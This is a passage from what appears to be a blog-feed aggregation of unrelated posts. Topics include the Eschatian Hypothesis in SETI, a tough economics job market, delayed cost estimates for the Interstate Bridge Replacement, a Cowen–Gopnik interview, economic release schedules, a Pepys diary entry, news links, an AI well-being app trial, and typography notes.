Hot Jupiters, in other words, are ‘loud.’ They’re the easiest of all radial velocity planet signatures to find. And yet they make up less than one percent of the exoplanets we’ve thus far found. The issue is broad. From the paper:

…over-representation of unusual astronomical phenomena in our surveys is not limited to exoplanetary science. One merely needs to look up at the night sky to note that approximately a third of the naked-eye stars are evolved giants, despite the fact less than one percent of stars are in such a state—a classic observational effect known as Malmquist bias (K. G. Malmquist 1922). Or consider that a supernova is expected roughly twice per century in Milky Way-sized galaxies (G. A. Tammann et al. 1994)—an astoundingly rare event. And yet, despite being an inherently rare type of transient, astronomers routinely detect thousands of supernovae every year (M. Nicholl 2021), as a product of their enormous luminosities.

That’s quite a thought. Go for a walk on a clear winter evening and look up. So many of the stars you’re seeing are giants in the terminal stages of their lifetimes. Those we can see at great range, but our nearest star, Proxima Centauri, demands a serious telescope for us to be able to see it. So we can’t help the bias that sets in until we realize how much of what we are seeing is rare. Sometimes we have to step back and ask ourselves why we are seeing it.

In SETI terms, Kipping steps back from the question to ask whether the first signatures of ETI, assuming one day they appear, will not be equally ‘loud,’ in the same way that supernovae are loud but actually quite rare. We might imagine a galaxy populated by stable, quiescent populations that we are not likely to see, cultures whose signatures are perhaps already in our data and accepted as natural. These are not the civilizations we would expect to see. What we might detect are the outliers, unstable cultures breaking into violent disequilibrium at the end of their lifetimes. These, supernova style, would be the ones that light up our sky.

Kipping’s toy model works on variables of average lifetime and luminosity, examining the consequences on detectability. A loud civilization is one that becomes highly visible for a fraction of its lifetime before going quiet for the rest. The model’s math demonstrates that a civilization that is 100 times louder than its peers – through any kind of disequilibrium with its normal state, as for example nuclear war or drastic climate change – becomes 1000 times more detectable. A supernova is incredibly rare, but also incredibly detectable.
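The factor of 1,000 is what simple volume counting gives you, assuming a Euclidean, flux-limited survey (my gloss on where the number comes from, not Kipping's exact derivation): a source 100 times more luminous is detectable out to 10 times the distance, and hence across 10³ times the volume. A toy check:

```python
# Toy check of the "loudness" scaling. Assuming a Euclidean,
# flux-limited survey, a source L times more luminous is detectable
# out to sqrt(L) times the distance, hence over L**1.5 times the volume.
def detectability_boost(luminosity_ratio: float) -> float:
    """Relative gain in surveyed volume (and expected detections)
    for a source `luminosity_ratio` times louder than its peers."""
    return luminosity_ratio ** 1.5

print(detectability_boost(100.0))  # 100x louder: 1000x the detectable volume
```

The same arithmetic explains why supernovae dominate transient catalogs despite being so rare.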

Image: The toy model at work. This is from Kipping’s Cool Worlds video on the Eschatian Hypothesis.

The Eschatian search strategy involves wide-field, high cadence surveys. In other words, observe at short intervals and keep observing with rapid revisit times to the same source. A search like this is optimized for transients, and the author points out that a number of observatories and observing programs are “moving toward a regime where the sky is effectively monitored as a time-domain data set.” The Vera Rubin Observatory moves in this direction, as does PANOPTES (Panoptic Astronomical Networked Observatories for a Public Transiting Exoplanet Survey). The latter is not a SETI program, but its emphasis on short-duration, repeatable events falls under the Eschatian umbrella.

Rather than targeting narrowly defined technosignatures, Eschatian search strategies would instead prioritize broad, anomalous transients—in flux, spectrum, or apparent motion—whose luminosities and timescales are difficult to reconcile with known astrophysical phenomena. Thus, agnostic anomaly detection efforts (e.g., D. Giles & L. Walkowicz 2019; A. Wheeler & D. Kipping 2019) would offer a suggested pathway forward.

I’ve often imagined the first SETI detection as marking a funeral beacon, though likely not an intentional one. The Eschatian Hypothesis fits that thought nicely, but it also leaves open the prospect of what we may not detect until we actually go into the galaxy, the existence of civilizations whose lifetimes are reckoned in millions of years if not more. The astronomer Charles Lineweaver has pointed out that most of our galaxy’s terrestrial-class worlds are two billion years older than Earth. Kipping quotes the brilliant science fiction writer Karl Schroeder when he tunes up an old Arthur Clarke notion: Any sufficiently advanced civilization will be indistinguishable from nature. Stability implies coming to terms with societal disintegration and mastering it.

Cultures like that are going to be hard to distinguish from background noise. We’re much more likely to see a hard-charging, shorter-lived civilization meeting its fate.

The paper is Kipping, “The Eschatian Hypothesis,” Research Notes of the AAS Vol. 9, No. 12 (December, 2025), 334. Full text.

Economics job market update

From John A. List:

AEA job market update. The numbers don’t lie, as this is the toughest market for PhD economists in recent memory.

JOE listings are down 20% from last year. Worse: they are 19% below COVID levels. Let that sink in.

The academic market took the biggest hit. Full-time US positions dropped 33% year-over-year. Liberal arts colleges and PhD-granting universities? Both down about a third. International academic postings fell 13% from last year, 25% from COVID.

Nonacademic isn’t much better: down 27% from last year, 45% below COVID. And federal government hiring? That’s where it gets ugly. Down 71% year-over-year, 79% below COVID. DOGE cuts plus the shutdown created a perfect storm.

One bright spot: private sector jobs in consulting, research, banking, and finance are holding steady at recent-year levels.

Bottom line for candidates: the data confirm what you’re feeling. It’s brutal out there. Universities facing their own financial pressures should still find ways to bridge unmatched candidates for another year. The talent is there—the opportunities aren’t. H/T John Cawley

Here is the link to the tweet.

The post Economics job market update appeared first on Marginal REVOLUTION.


IBR: Still hiding–and lying about–coming billions in cost overruns

Once again, the Interstate Bridge Replacement Project has blown through a deadline to report a new, much higher cost for this huge project.

They’ve now delayed for two full years telling lawmakers and the public how much the project will cost, and it seems certain to approach $10 billion.

Not only that, but IBR officials flip-flopped on the need for a delay.  In September, they testified to legislators that they could easily produce a new estimate without knowing whether the Coast Guard would require a higher navigation clearance; now they’re saying they have to wait until the Coast Guard renders a decision.

IBR officials remain evasive about when a new cost estimate will be revealed, hinting it may take weeks or as much as two months after the Coast Guard decision is rendered.  It seems likely that IBR will delay releasing a new estimate until after both the Oregon and Washington legislatures have adjourned their 2026 sessions in early March.

In truth, IBR actually knows within a reasonable range how much the project will cost:  it has had a well-financed group of staff and consultants working on project cost estimating for the past five years.  It’s using the Coast Guard process as an excuse to avoid delivering bad–and likely very bad–news about the exploding cost of this mega-project.

 

The Oregon and Washington highway departments have a huge problem–a ten billion dollar problem.  They’ve been working for years on a new cost estimate for the gargantuan Interstate Bridge Replacement Project.  In 2022, state officials said the project would cost $5 to $7.5 billion.  For the past 24 months, they’ve acknowledged that estimate is too low, and they’ve repeatedly said they would release a new cost estimate “real soon.”  They were scheduled to release a new cost estimate on December 15, but are now saying we’ll all have to wait until sometime in 2026.

Their excuse for not releasing the cost estimate now is that they say they now need to wait for a Coast Guard decision on bridge height due early next year.  But just 90 days ago, IBR officials told legislators that they could provide an estimate, without waiting for that same Coast Guard decision.    IBR has already costed out both versions of the bridge, and according to their own testimony, almost every other element of the bridge remains the same.  The real reason they’re holding back is that the new estimate is going to push the cost of the bridge up by billions–to between $9 and $10 billion–and they don’t want legislators or the public to know.

IBR officials have given flatly contradictory testimony to the same legislative oversight committee, clearly inventing an excuse to continue to keep legislators (and the public) in the dark.

IBR Testimony September 15:  “we have enough information . . .  that we can update and do an estimate now, rather than waiting [for the Coast Guard decision].”

IBR Testimony  December 15:  “. . .information [about the Coast Guard decision] is really critical to develop an accurate and comprehensive cost estimate . . . “

A history of repeated delays for a new cost estimate

For the past two years, the Oregon and Washington highway departments have been stringing along apparently gullible state legislators, failing to reveal the growing cost of the Interstate Bridge Project.  Project Director Greg Johnson disclosed in January of 2024 that the project’s cost estimate was too low and needed to be revised, promising a new estimate in about six months.  Since then they’ve offered up several new deadlines, and missed every one of them.  A new estimate has always been about 90 to 180 days away.

Three months ago, at a tense hearing with legislators from Oregon and Washington, state transportation officials promised they’d produce a long-delayed new (and higher) cost estimate by December 15.  As KGW reported in September, legislators are getting impatient to see an updated cost estimate.  At a September 15, 2025 meeting of the Oregon and Washington joint legislative committee overseeing the project, legislators made it clear that they wanted to see a new estimate at their December 15, 2025 meeting.

As the environmental process has dragged on, so has the wait for the cost estimate — but lawmakers on the bi-state committee indicated they’re running out of patience and don’t want to see the cost estimate slip into 2026. Washington Rep. Ed Orcutt requested that the team be ready to provide the new estimate at the committee’s next meeting in December. KGW followed up with [IBR project director Greg] Johnson, who appeared to indicate that the team could meet that deadline, writing in an email that “the Program is currently planning to provide more information on an updated cost estimate and financial plan in the Bi-state Legislative Committee meeting on Dec. 15.”

Washington State Representative Ed Orcutt spoke out at the September meeting:

So on slide 61 you show on the horizon, late 2025 early 2026 is a cost estimate.
We’ve been waiting a long time for an updated cost estimate, and we do have a meeting if I’m correct, on December 15, which is pretty late in 2025, and I believe, about a year since we were promised one.  I would really request that we actually have an updated cost estimate for that December 15 meeting, please. Thank you.

Oregon State Senator Khanh Pham recited the long history of delays in releasing a new cost estimate, and the critical need for the legislators to know how much this would cost:

“. . . we have been eagerly awaiting the cost estimate. You know, we were told in 2024 we would get it. . . . you told us in 2024 that it wouldn’t be until June of 2025 when we would get the updated cost estimate, I remember because I specifically said it would be really helpful if we could get it before the transportation session the legislative session ends, so that way we can actually incorporate that into our understanding of what the transportation funding needs are for the state moving forward. But, you know, I was told June 2025, and then, then recently, we were told no, it looks like it’ll be September of 2025, and now we’re looking at December of 2025 if not early 2026 and so I just want to raise that because, . . .  we’re looking at cost increases for ODOT projects of 30, 40, to 50 percent changes, even 40 to 60 percent  changes from 2022 and if the IBR project increase is similar,  at that similar rate, we’re looking at $8 to $10 billion.  It would be helpful if we could get that updated cost estimate as soon as possible, so that way we can incorporate that into our understanding of what our respective legislatures we need to budget for and find funding for.

Another indefinite delay:  And contradictory claims about the Coast Guard

It’s now apparent that Oregon and Washington legislators will have to wait until some time next year to find out how much more the Interstate Bridge Replacement will cost–and what they will be expected to pay. At the Monday morning December 15 meeting, IBR officials made it clear they weren’t going to provide a new cost estimate until some unspecified time next year (2026).  In a slide presented at the committee meeting, IBR disclosed they are not going to provide a cost estimate, saying they are waiting for a decision from the Coast Guard which is “necessary to complete an accurate and comprehensive cost estimate.”

The IBR’s new interim project director Carly Francis testified on December 15 that IBR was anticipating the Coast Guard’s final navigation decision in early 2026, and that they now found it “critical” to know that decision before publishing a new cost estimate–exactly the opposite of what IBR staff told the same committee three months earlier on September 15: that they knew enough about the fixed and movable spans to develop a cost estimate and that there was no need to wait.

We are, as you’ve heard earlier, anticipating a decision from the Coast Guard in early 2026 regarding bridge height, and that will help confirm which direction we go: fixed or removable span. And also will help us understand final details with respect to getting to the amended record decision, which is that federal approval to move into construction.  When we last met, when you folks last met without me, that timing for that decision from the US Coast Guard was not known, and so given that it is now very in the near term for the program, we are trying to make sure that we’re reflecting that outcome in our planning and the cost estimate body of work. And that information is really critical to develop an accurate and comprehensive cost estimate. I know Ray, deputy program administrator, Ray Mabey already noted that we are ready to build whatever bridge that is permitted.

Francis claims that in September they didn’t know the timing for the Coast Guard decision, but in fact, as IBR associate director Frank Green testified in September, they were projecting exactly the same time frame for the release of the Coast Guard decision as they do now: “early 2026.” In December, Ms. Francis said they were “anticipating a decision from the Coast Guard in early 2026 regarding bridge height,” which is almost exactly the same as what Mr. Green said in September: “Submittal of that Navigation Impact Report will likely lead to a revised preliminary clearance navigation determination early next year.”

IBR officials have thus made directly contradictory statements about whether they needed the Coast Guard decision to produce the cost estimate. In September, Frank Green, Associate Director of the IBR project, testified to the Joint Oregon-Washington legislative oversight committee that they were planning to release a new cost estimate prior to the Coast Guard issuing a new navigation determination:

We are looking to do an updated cost estimate, as Greg had mentioned earlier,  for both a fixed span bridge and a movable span bridge, recognizing that the program wanted to update our estimate and update our financial plan,  prior to when we’ll have that kind of bridge decision determined. Currently we’re working with the Coast Guard and working with both headquarters. Submittal  of that Navigation Impact Report will likely lead to a revised preliminary clearance navigation determination early next year, but we recognize we have enough information on the fixed span and conceptual understanding of what the movable bridge would be so that we can update and do an estimate now, rather than waiting for that PNCD, and having that that cost estimate take a little bit longer.

Video Recording of September 15, 2025 Oregon Washington Committee Meeting at approximately 59:30.  (emphasis added)

As KGW TV noted in its report on the December 15, 2025 meeting, Green’s earlier testimony made it clear that there was no need to delay the release of an estimate because of the timing of the Coast Guard decision.

But Green also indicated at the time [September 15] that preparing two estimates wouldn’t be a problem, and that the team was planning to do so before it received a decision from the Coast Guard.

Blaming the Coast Guard not only directly contradicts what IBR told legislators in September; it also represents a new and different excuse for delaying release of a new cost estimate. In August, project director Greg Johnson claimed that the preparation of the cost estimate was delayed by the project’s extended NEPA review–even though the cost estimate process is independent of NEPA.

A chronology of repeated delays in releasing a new, higher cost estimate

That means it will now have been more than two years since IBR first publicly acknowledged that a new and higher cost estimate for the IBR was in the works. In January 2024, project director Greg Johnson told Oregon Public Broadcasting that they’d have a new estimate in about six months. Since then, as we’ve chronicled at City Observatory, IBR officials have repeatedly delayed revealing a new cost estimate. A brief chronology of promised (and missed) deadlines for new cost estimates is as follows:

  • Jan 2024: IBR cost update will be out in six months
  • June 2024: announces it’ll be June 2025 (another year)
  • April 2025: not until September 2025 (five more months)
  • September 2025: not until December 2025 (three more months)
  • And now, in December 2025, we’re told, it will be “early 2026.” (another three to five months)

No matter what date it is, it always seems like we are three months, six months or a year away from finding out the real cost of the IBR. It has been apparent through all this time that the cost will go up significantly, almost certainly into the $9 billion to $10 billion range. The truth is not that IBR staff can’t generate a cost estimate; it’s that they can’t handle the blowback that will come when they finally ‘fess up to the project’s vastly inflated costs.

A politically inconvenient cost overrun

The repeated delays of the embarrassing cost increase correspond closely to major political developments.  Throughout the 2025 Oregon Legislative session, as legislators were debating a multi-billion dollar transportation package, ODOT buried and refused to talk about the growing cost of the IBR.  The big transportation bill, HB 2025, failed to move forward in the regular legislative session, and the Governor called legislators back to a September special session, which belatedly passed a much smaller stopgap funding measure, HB 3991.  Now, major portions of that bill, including key tax increases, are likely to be referred to Oregon voters for a referendum in 2026.  In addition, both Oregon and Washington face significant fiscal challenges in the year ahead, something both legislatures will be dealing with in just a few weeks.  The Oregon Legislature will convene for its even-year “short” session on February 2 and adjourn no later than March 9, 2026.  Washington’s Legislature convenes on January 12 and should adjourn on March 12. Anybody want to lay odds that the new cost estimate won’t come out until mid-March, or later?

The truth is that IBR project officials have a very, very good idea of the range of probable costs of both the fixed span and movable span options. The IBR has had a team of staff and consultants working on cost issues for years: this is an ongoing part of project planning, not an episodic effort that only happens after one or two external bureaucratic hurdles are crossed. IBR, as their outgoing project director has said, is building “basically the same project” as the old Columbia River Crossing, and virtually none of the major features of the project have changed in the past three years. It’s also important to keep in mind that the cost estimate is not a single precise dollar amount; rather, it is a wide range: the current estimate (produced three years ago) has a mid-point of $6 billion, with a range of costs running from $5 billion to $7.5 billion. It beggars belief that a project that has spent $273 million on consultants over the past seven years doesn’t have a pretty good idea, within a billion dollars or so, of what the current estimated cost of this project is (with an allowance for the added cost of a movable span option). The reality here is not that IBR doesn’t know about how much this will cost; it is that they really don’t want anybody else to know how much it will cost.

Coast Guard is unlikely to have a decision any time soon

Portland television station KGW-TV has closely followed the IBR permitting plans.  It has interviewed Greg Johnson, and noted that while Johnson hopes that they will have a Coast Guard decision in just 90 days, by mid-February 2026, that could be the “best case” scenario.

As KGW noted, last time IBR sought a Coast Guard determination it took nearly six months, which would put a determination into May, 2026–and presumably, the release of a final cost estimate would be some time after that.  (And either way, the Coast Guard decision and the new cost estimate won’t be made until after Greg Johnson’s final day as IBR director–already set for January 2026).

And even though they say they are waiting for a new Coast Guard preliminary navigation decision, it will likely be weeks or months after that decision before IBR actually releases a new cost estimate. Like her predecessor, Carly Francis was utterly opaque about the timing of the next estimate. As KGW TV reported, IBR “did not offer any kind of definitive timeline this time around,” quoting Carly Francis as saying:

“I would say we are trying to get things done certainly early next year to be able to fit into all of the necessary time frames. So I think that is sort of in that scale of a month or two space to be able to finalize that stuff but that’s sort of a loose range is what I can say to you today because we don’t have it mapped out completely and because of the differences in schedule in the delivery of a fixed and a moveable span.”


We’re getting down to the wire for gifts to be shipped in time for Xmas. Take a look at the 2025 Kottke Holiday Gift Guide if you still need to shop for your fam & friends.

My Conversation with Alison Gopnik

Here is the audio, video, and transcript.  Here is part of the episode summary:

Tyler and Alison cover how children systematically experiment on the world and what study she’d run with $100 million, why babies are more conscious than adults and what consciousness even means, episodic memory and aphantasia, whether Freud got anything right about childhood and what’s held up best from Piaget, how we should teach young children versus school-age kids, how AI should change K-12 education and Gopnik’s case that it’s a cultural technology rather than intelligence, whether the enterprise of twin studies makes sense and why she sees nature versus nurture as the wrong framework entirely, autism and ADHD as diagnostic categories, whether the success of her siblings belies her skepticism about genetic inheritance, her new project on the economics and philosophy of caregiving, and more.

Excerpt:

COWEN: If it’s something like height, where there is clearly an environmental component, especially if the child is not well-fed, but it seems perfectly fine to say above a certain dietary level, it’s mostly genetic, right? No one says that’s ambiguous, and more and more traits will become like that.

GOPNIK: Well, first of all, I’m not sure that’s true. To a striking degree, the traits that people have looked at, like educational attainment, for example — we haven’t found consistent relationships to genetics. I think the reason for that is exactly because there’s this very complicated developmental process that goes from the genetics to the outcome.

Even if you think about fruit flies, for example. I have some geneticist colleagues who work on this — fruit fly sex determination. You’d think, “Well, that has to be just the result of genes.” It turns out that there’s this long developmental — long by fruit fly standards — developmental process that goes from the genetics to the proteins to the morphology, and there’s lots of possibility of variation throughout that. I think that hasn’t turned out to be a scientifically helpful way of understanding what’s going on in development.

The other thing, of course, is, from my perspective, the common features of, say, what kids are doing are much more interesting than the variations. What I really want to know is how is it that anyone could have a brain that enables them to accomplish these amazing capacities? Thinking about, is this child smarter than the other one, given how unbelievably smart all of them are to begin with, I just think it’s not an interesting question.

COWEN: But say, what you would call the lay belief that smarter parents give birth to smarter children, at least above subsistence — surely you would accept that, right?

GOPNIK: Again, what does smarter mean?

COWEN: How you would do on an IQ test.

GOPNIK: What does genetics mean? It’s interesting, Tyler, that IQ tests, for example — they have their own scholarly and scientific universe, but they’re not something that we would teach about or think about in a developmental psychology class, and there’s a good principled reason for that. The good principled reason — this has come up a lot in AI recently. There’s this idea in AI of artificial general intelligence, and that is assuming that there’s something called general intelligence.

Again, I think, a lot like consciousness or life, it’s one of these lay ideas about how people work. When you actually look at children, for example, what you see is not just that there isn’t a single thing that’s general intelligence. You actually see different cognitive capacities that are in tension with one another. You mentioned one about the scientist who’s trying to think of some new idea versus the scientist who’s looking at a more specific idea, right? A classic example of this tension that I’ve talked about and studied is in computer sciences: exploration versus exploitation.

What do you count as IQ? In fact, most of what IQ is about is how well do you do in school? How well do you do on school tests? That’s actually, in many respects, in tension with how good are you at exploring the world around you? The kinds of things that you need to do to have particular goals, to accomplish them, the kinds of things that we emphasize a lot, say, in a school context, are actually in tension. This gets back to the point about babies being more conscious than we are — are actually in tension with the kinds of things that will let you explore.

Think about the Bayesian example. If you have a flatter prior, and you pay more attention to evidence, you are probably not going to do as well on an IQ test…

COWEN: There’s you — you’re tenured at Berkeley, you’re famous. There’s Blake, The Definitive Warhol Biography, and Adam, who’s amazing, writes for the New Yorker, and you don’t believe inheritability and IQ being very concrete things? I just don’t get it. I think you’re in denial.

GOPNIK: Actually, I think that example is maybe partly why I don’t believe in that. In fact, what I do believe is that the effect of caregiving is to increase variability, is to increase variation. Our family, our care — there were six of us in 11 years. My parents were graduate students, and even before they were graduate students, they were that great generation of immigrant kids.

We had this combination of a great deal of warmth, a great deal of love, an enormous amount of stuff that was around us — books and ideas. We got taken to the Guggenheim, when Adam was three and I was four, for the opening of the Guggenheim. We both remember this vividly. But we were also completely free. We were just in regular public schools. As was true in those days, in general, we came home after school, and we basically did whatever it was that we wanted. I was involved. The kids were taking care of each other a lot of the time.

The result is that you get a lot of variation. It’s an interesting example in our family where we have six kids who presumably all have somewhat similar genetics, all in that 11 years grow up in the same context, and they come out completely differently. They come out with really different strengths, really different weaknesses, things that they’re good at, things that they’re not good at. Even if you think about what Blake and Adam and I are like as thinkers, we’re all foxes instead of hedgehogs. We’re all people who have done lots of different things and thought about lots of different things.

So, my view is that what nurture will do is let you have variability. That’s the thing that, in a sense, is heritable. That’s contradictory, the idea that what’s heritable is the standard deviation instead of the mean, but that’s my view about that. I think my childhood did have the effect of making me suspicious of those simple nature-nurture oppositions.
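Gopnik’s Bayesian aside — a flatter prior pays more attention to evidence — can be made concrete with a toy Beta-Binomial sketch. This is my illustration, not anything from the conversation or from Gopnik’s work: the same evidence moves a flat prior’s estimate much further than a concentrated one’s.

```python
# Toy Beta-Binomial illustration (hypothetical numbers): a flat prior
# updates much further on the same evidence than a confident prior does.
# With a Beta(a, b) prior and k successes in n trials, the posterior is
# Beta(a + k, b + n - k), whose mean is (a + k) / (a + b + n).

def posterior_mean(a, b, k, n):
    """Posterior mean of a Beta(a, b) prior after k successes in n trials."""
    return (a + k) / (a + b + n)

k, n = 8, 10  # observe 8 successes in 10 trials; both priors start at mean 0.5

flat_shift = abs(posterior_mean(1, 1, k, n) - 0.5)      # Beta(1, 1): flat prior
strong_shift = abs(posterior_mean(50, 50, k, n) - 0.5)  # Beta(50, 50): confident prior

print(f"flat prior posterior mean:   {posterior_mean(1, 1, k, n):.3f}")    # 0.750
print(f"strong prior posterior mean: {posterior_mean(50, 50, k, n):.3f}")  # 0.527
```

The flat prior jumps from 0.5 to 0.75 on ten observations; the concentrated prior barely moves — a crude analogue of the exploration-versus-exploitation tension described above.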

Here are the books of Alison Gopnik.

The post My Conversation with Alison Gopnik appeared first on Marginal REVOLUTION.

       


 

Thursday: CPI, Unemployment Claims, Philly Fed Mfg

Mortgage Rates Note: Mortgage rates are from MortgageNewsDaily.com and are for top tier scenarios.

Thursday:
• At 8:30 AM: The initial weekly unemployment claims report will be released. There were 236,000 initial claims last week.

• At 8:30 AM ET: The Consumer Price Index for November from the BLS. The consensus is for a 0.3% increase in CPI, and a 0.2% increase in core CPI. The consensus is for CPI to be up 3.1% year-over-year and core CPI to be up 3.1% YoY.

• At 8:30 AM: The Philly Fed manufacturing survey for December. The consensus is for a reading of 2.2, up from -1.7.

• At 11:00 AM: The Kansas City Fed manufacturing survey for December.

The Apollo Transforming Printer

On the Library of Congress’s Worlds Revealed blog, a fascinating piece on a fascinating piece of hardware used by NASA to process lunar photographs taken for and by the Apollo program into orthorectified imagery useful… More

‘Three Norths’ Leave England

The Ordnance Survey has announced that the triple alignment of true north, grid north (on OS maps) and magnetic north—the so-called three norths—has left England and is now over the North Sea. It’ll make landfall… More

Wednesday 17 December 1662

This morning come Mr. Lee, Wade, and Evett, intending to have gone upon our new design to the Tower today; but it raining, and the work being to be done in the open garden, we put it off to Friday next. And so I to the office doing business, and then dined at home with my poor wife with great content, and so to the office again and made an end of examining the other of Mr. Holland’s books about the Navy, with which I am much contented, and so to other businesses till night at my office, and so home to supper, and after much dear company and talk with my wife, to bed.

Read the annotations

Telescope Types

I'm trying to buy a gravitational lens for my camera, but I can't tell if the manufacturers are listing comoving focal length or proper focal length.

What’s happening over that tree?


Lawler: Early Read on Existing Home Sales in November and Update on Mortgage/MBS Yields and Spreads

Today, in the Calculated Risk Real Estate Newsletter: Lawler: Early Read on Existing Home Sales in November and Update on Mortgage/MBS Yields and Spreads

A brief excerpt:
From housing economist Tom Lawler:

Based on publicly-available local realtor/MLS reports released across the country through today, I project that existing home sales as estimated by the National Association of Realtors ran at a seasonally adjusted annual rate of 4.10 million in November, unchanged from October’s preliminary pace and down 1.7% from last November’s seasonally adjusted pace. Unadjusted sales should show a larger YOY % decline, reflecting this November’s lower business-day count relative to last November.

Local realtor/MLS reports suggest that the median existing single-family home sales price last month was up by about 1.9% from a year earlier.

CR Note: The NAR is scheduled to report November existing home sales on Friday. The consensus is for 4.15 million SAAR, up from 4.10 million in October.
There is much more in the article.

Links 12/17/25

Links for you. Science:

The Rainforests Being Cleared to Build Your R.V.
What new protections will mean for these widely hunted sharks
Humans killed millions of vultures. Now people are paying the price.
The common vaccines that can prevent chronic disease or some cancers
Scientists may have solved why this ancient, advanced civilization vanished
Elusive orchid plays key role in plan to bring bird back after 30 years

Other:

Doughnuts and Bullets: The agony and absurdity of working for RFK Jr. (must-read)
The Job Market
Republicans nix bill naming D.C. post office after Chuck Brown (BOOOO!!!!)
The Pundits Were All Wrong (very good)
A Few Bad Men: The Hegseth murder-on-the-high-seas scandal is only part of the story. This administration has put sadism at the heart of its policy and its politics.
The First Epstein Report Ignored Summers. Harvard Must Do Better.
Statement from the American Economic Association (on Summers’ resignation)
Delirious president goes on manic posting binge
Trump Seizes Back the Spotlight. That may not be the boon he thinks it is.
Cracks have emerged in the Maga coalition
“Subway Builder” turns Metro enthusiasts into transit designers (very cool)
Waymo’s Self-Driving Cars Are Suddenly Behaving Like New York Cabbies
About That Safety Thing
OpenAI’s “Code Red”
Who Amongst Us
Trump just trashed his most major issue: ‘Worst messaging from a politician in history’
Small businesses suffer brutally under Trump
The 26-Minute, 51% Wipeout That Deepened the Trumps’ Crypto Woes
Steve Bannon’s Surprisingly Key Role in the Epstein Scandal
Olivia Nuzzi tries and fails to save her reputation in ‘American Canto’
What the special election in Tennessee says about the 2026 midterms
Why Does A.I. Write Like… That?
‘Kill Everybody’: Hegseth’s Reported Order Echoes WWII War Crime
Detroit finally has a RoboCop statue
Trump calls Ilhan Omar ‘garbage’ and says Somalis should ‘go back to where they came from’
Suspect arrested in January 2021 D.C. pipe bomb case
Trump pardons grifter indicted by his administration earlier this year
Trump Is Wreaking Havoc With His Favorite Power
Trump’s own voters begin blaming him for affordability crisis
Palantir CEO Says Making War Crimes Constitutional Would Be Good for Business

A Reading List for the End of Civilization

Not long ago, I got touted in The Atlantic as the ultimate source on the death of civilization. I responded with denials, and even offered to take a polygraph test.

I’m innocent. I’m just a patsy. They’re trying to pin this on me—don’t believe them.

Then I pulled out the ultimate alibi: The death scene was a set-up. Civilization isn’t dying—it’s coming back. Just give it time.

I spelled out the reasons in this article.

Ah, but I still had some things to explain. That’s because The Atlantic published evidence of my complicity—all because of 41 mysterious books.

Some of my books on societal collapse

Here’s what they pinned on me:

Last year, I visited the music historian Ted Gioia to talk about the death of civilization.

He welcomed me into his suburban-Texas home and showed me to a sunlit library. At the center of the room, arranged neatly on a countertop, stood 41 books. These, he said, were the books I needed to read.

The display included all seven volumes of Edward Gibbon’s 18th-century opus, The Decline and Fall of the Roman Empire; both volumes of Oswald Spengler’s World War I–era tract, The Decline of the West; and a 2,500-year-old account of the Peloponnesian War by Thucydides, who “was the first historian to look at his own culture, Greece, and say, I’m going to tell you the story of how stupid we were,” Gioia explained.

Gioia’s contributions to this lineage of doomsaying have made him into something of an internet celebrity….

In the aftermath, everybody was asking about those 41 books. Did I really have a reading list for the end of civilization?

With some reluctance, I agreed to share it. I’m doing that today.

But don’t hold it against me. Books are just circumstantial evidence. I didn’t actually kill civilization—I just read about it. I never left my comfy chair.

It’s true that I earned a living, some years back, as a kind of futurist. This is a valuable skill in turbulent times. I probably handled this vocation with a more holistic approach than others. That meant that I took old books and primary sources very seriously, and used them to interpret current-day statistical, anecdotal, and theoretical information.




In my world, game theory and data analysis co-exist with history, philosophy, and literature—some of it two thousand years old. If you can bring those together, you may gain insights that others might miss.

That’s what I try to do here at The Honest Broker.

With that proviso, I’ll recommend the following books on societal collapse. It’s not the full 41 volumes mentioned above—but below I will discuss 22 of those titles.

Read more

An RCT on AI and mental health

Young adults today face unprecedented mental health challenges, yet many hesitate to seek support due to barriers such as accessibility, stigma, and time constraints. Bite-sized well-being interventions offer a promising solution to preventing mental distress before it escalates to clinical levels, but have not yet been delivered through personalized, interactive, and scalable technology. We conducted the first multi-institutional, longitudinal, preregistered randomized controlled trial of a generative AI-powered mobile app (“Flourish”) designed to address this gap. Over six weeks in Fall 2024, 486 undergraduate students from three U.S. institutions were randomized to receive app access or waitlist control. Participants in the treatment condition reported significantly greater positive affect, resilience, and social well-being (i.e., increased belonging, closeness to community, and reduced loneliness) and were buffered against declines in mindfulness and flourishing. These findings suggest that, with purposeful and ethical design, generative AI can deliver proactive, population-level well-being interventions that produce measurable benefits.

That is from a new paper by Julie Y.A. Cachia, et al. A single paper or study is hardly dispositive, even when it is an RCT. But you should beware of those, such as Jon Haidt and Jean Twenge, who are conducting an evidence-less jihad against AI for younger people.

Via the excellent Kevin Lewis.

The post An RCT on AI and mental health appeared first on Marginal REVOLUTION.

       


 

James Cameron’s Instructions to Theater Projectionists Regarding ‘Avatar 3: Fire and Ash’

The letter is typeset in Papyrus, the typeface for which James Cameron’s affection inspired not one but two classic SNL shorts starring Ryan Gosling — which Cameron has a good sense of humor about.

Terrence Malick’s letter accompanying Tree of Life in 2011 was plainly and humbly set in Helvetica. David Lynch’s accompanying Mulholland Drive was also in Helvetica, but in a very Lynchian way. And then there is Stanley Kubrick, whose letter to projectionists that accompanied Barry Lyndon was typeset in Futura — quite the feat in 1975. (It was almost certainly IBM’s Mid-Century typeface, a beautiful adaptation of Futura for their Executive line of typewriters.)

 ★ 

Typefaces for Dyslexia

I dare say this post from Adrian Roselli — first published in 2015 and updated 16 times (and counting) since — is the definitive debunking of the pseudoscience claims regarding deliberately ugly fonts being somehow beneficial to readers with dyslexia.

 ★ 

Zara Picken’s ‘Modern Illustration’

Modern Illustration is a project by illustrator Zara Picken, featuring print artefacts from her extensive personal collection. Her aim is to preserve and document outstanding examples of mid-20th century commercial art, creating an accessible resource for understanding illustration history.

Glorious collection of mid-century illustrations and graphic design. Also a good follow on Instagram. (Via Dan Cederholm.)

 ★ 

★ Apple TV’s New Fanfare

Tim Nudd, writing at Ad Age a few weeks ago (paywalled, alas):

As we mentioned in roundup yesterday, Finneas (aka, Finneas O’Connell) has developed a new sonic logo for Apple TV, the streaming service previously known as Apple TV+. However, the rebrand, created with Apple agency TBWA\Media Arts Lab, goes beyond the audio mnemonics to include a striking new visual look as well.

The visual branding centers on layers of shifting colored light, a metaphor for the range of genres and emotions that Apple TV has cultivated since its 2019 debut.

